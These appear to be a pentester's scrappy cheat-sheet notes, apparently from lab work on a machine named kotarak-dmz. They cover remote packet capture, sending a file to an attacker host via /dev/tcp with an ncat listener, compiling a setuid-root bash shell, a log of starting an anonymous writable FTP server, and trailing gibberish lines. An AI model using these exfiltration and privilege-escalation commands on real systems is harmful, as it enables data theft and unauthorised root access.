ssh <user>@<target> "/bin/tcpdump -i <interface> -nnU -s0 -w <pcap.pcap> '<BPF filter>'
ssh <user>@<target> "/bin/tcpdump -i <interface> -nnU -s0 -w <pcap.pcap> '<BPF filter>' | wireshark -k -i -
cat <file> > /dev/tcp/<attacker>/<attacker_port>
ncat -nlvp <attacker_port> > <file>
If you find you can run command as root, you could compile a setuid bash for you! First create a c program:
int main(void)
{
setuid(0);
setgid(0);
system("/bin/bash");
}
gcc setuid.c -o <outputfile>
atanas@kotarak-dmz:/tmp/ftptest$ python -m pyftpdlib -p21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user.
RuntimeWarning)
Traceback (most recent call last):
File "/usr/lib/python2.7/runpy.py", line 174, in _run_module_as_main
"__main__", fname, loader, pkg_name)
File "/usr/lib/python2.7/runpy.py", line 72, in _run_code
exec code in run_globals
File "/usr/local/lib/python2.7/dist-packages/pyftpdlib/__main__.py", line 100, in <module>
main()
File "/usr/local/lib/python2.7/dist-packages/pyftpdlib/__main__.py", line 92, in main
ftpd = FTPServer((options.interface, options.port), FTPHandler)
File "/usr/local/lib/python2.7/dist-packages/pyftpdlib/servers.py", line 114, in __init__
self.bind_af_unspecified(address_or_socket)
File "/usr/local/lib/python2.7/dist-packages/pyftpdlib/ioloop.py", line 1018, in bind_af_unspecified
raise socket.error(err)
socket.error: [Errno 13] Permission denied
atanas@kotarak-dmz:/tmp/ftptest$ authbind python -m pyftpdlib -p21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user.
RuntimeWarning)
[I 2020-02-16 09:36:21] >>> starting FTP server on 0.0.0.0:21, pid=25040 <<<
qjioqwjwgoejoe\n
qejqoejqoqiwejdjiow\n
qeoiqj\n